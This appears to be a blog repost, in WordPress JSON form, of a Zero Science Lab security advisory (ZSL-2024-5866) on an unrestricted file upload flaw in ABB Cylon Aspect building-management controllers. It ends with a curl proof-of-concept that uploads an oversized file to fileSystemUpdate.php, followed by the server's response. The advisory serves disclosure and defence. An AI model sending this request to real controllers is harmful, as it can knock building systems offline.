{"id":60569,"date":"2024-12-03T01:20:03","date_gmt":"2024-12-02T22:20:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182910\/ZSL-2024-5866.txt"},"modified":"2024-12-03T01:20:03","modified_gmt":"2024-12-02T22:20:03","slug":"abb-cylon-aspect-3-08-00-filesystemupdate-php-file-upload-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/abb-cylon-aspect-3-08-00-filesystemupdate-php-file-upload-denial-of-service\/","title":{"rendered":"ABB Cylon Aspect 3.08.00 fileSystemUpdate.php File Upload \/ Denial Of Service"},"content":{"rendered":"<p>ABB Cylon Aspect 3.08.00 (fileSystemUpdate.php) Insecure File Upload<\/p>\n<p>Vendor: ABB Ltd.<br \/>Product web page: https:\/\/www.global.abb<br \/>Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio<br \/>Firmware: &lt;=3.08.00<\/p>\n<p>Summary: ASPECT is an award-winning scalable building energy management<br \/>and control solution designed to allow users seamless access to their<br \/>building data through standard building protocols including smart devices.<\/p>\n<p>Desc: A vulnerability exists in the fileSystemUpdate.php endpoint of the<br \/>ABB BEMS controller due to improper handling of uploaded files. The endpoint<br \/>lacks restrictions on file size and type, allowing attackers to upload excessively<br \/>large or malicious files. This flaw could be exploited to cause Denial-of-Service<br \/>(DoS) attacks, memory leaks, or buffer overflows, potentially leading to system<br \/>crashes or further compromise.<\/p>\n<p>Tested on: GNU\/Linux 3.15.10 (armv7l)<br \/>GNU\/Linux 3.10.0 (x86_64)<br \/>GNU\/Linux 2.6.32 (x86_64)<br \/>Intel(R) Atom(TM) Processor E3930 @ 1.30GHz<br \/>Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz<br \/>PHP\/7.3.11<br \/>PHP\/5.6.30<br \/>PHP\/5.4.16<br \/>PHP\/4.4.8<br \/>PHP\/5.3.3<br \/>AspectFT Automation Application Server<br \/>lighttpd\/1.4.32<br \/>lighttpd\/1.4.18<br \/>Apache\/2.2.15 (CentOS)<br \/>OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)<br \/>OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)<\/p>\n<p>Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/>@zeroscience<\/p>\n<p>Advisory ID: ZSL-2024-5866<br \/>Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5866.php<\/p>\n<p>21.04.2024<\/p>\n<p>&#8212;<\/p>\n<p>$ cat project<\/p>\n<p>P R O J E C T<\/p>\n<p>.|<br \/>| |<br \/>|&#8217;| ._____<br \/>___ | | |. |&#8217; .&#8212;&#8220;|<br \/>_ .-&#8216; &#8216;-. | | .&#8211;&#8216;| || | _| |<br \/>.-&#8216;| _.| | || &#8216;-__ | | | || |<br \/>|&#8217; | |. | || | | | | || |<br \/>____| &#8216;-&#8216; &#8216; &#8220;&#8221; &#8216;-&#8216; &#8216;-.&#8217; &#8216;` |____<br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2592\u2593\u2588\u2588\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <\/p>\n<p>$ curl &#8211;path-as-is -X POST &#8220;http:\/\/192.168.73.31\/fileSystemUpdate.php&#8221; \\<br \/>&gt; -H &#8220;Content-Type: multipart\/form-data; boundary=&#8212;-J0X&#8221; \\<br \/>&gt; -H &#8220;Accept-Encoding: gzip, deflate, br&#8221; \\<br \/>&gt; -H &#8220;Cookie: PHPSESSID=xxx&#8221; \\<br \/>&gt; -d &#8220;&#8212;&#8212;J0X\\<br \/>&gt; Content-Disposition: form-data; name=\\&#8221;userfile\\&#8221;; filename=\\&#8221;test.aam\\&#8221;\\<br \/>&gt; Content-Type: application\/octet-stream\\<br \/>&gt; \\<br \/>&gt; 5GB_CONTENT\\<br \/>&gt; &#8212;&#8212;J0X&#8211;\\<br \/>&gt; &#8220;<\/p>\n<p>HTTP\/1.1 302 Found<br \/>Strict-Transport-Security: max-age=31536000; includeSubdomains<br \/>Expires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br \/>Pragma: no-cache<br \/>Location: fileSystemUpdateExecuteDisplay.php?file=test.aam<br \/>Content-type: text\/html; charset=UTF-8<br \/>Content-Length: 0<br \/>Date: Thu, 28 Nov 2024 15:05:44 GMT<\/p>\n","protected":false},"excerpt":{"rendered":"<p>ABB Cylon Aspect 3.08.00 (fileSystemUpdate.php) Insecure File Upload Vendor: ABB Ltd.Product web page: https:\/\/www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-StudioFirmware: &lt;=3.08.00 Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices. Desc: A vulnerability exists in the &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60569","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60569","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60569"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60569\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60569"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60569"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60569"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}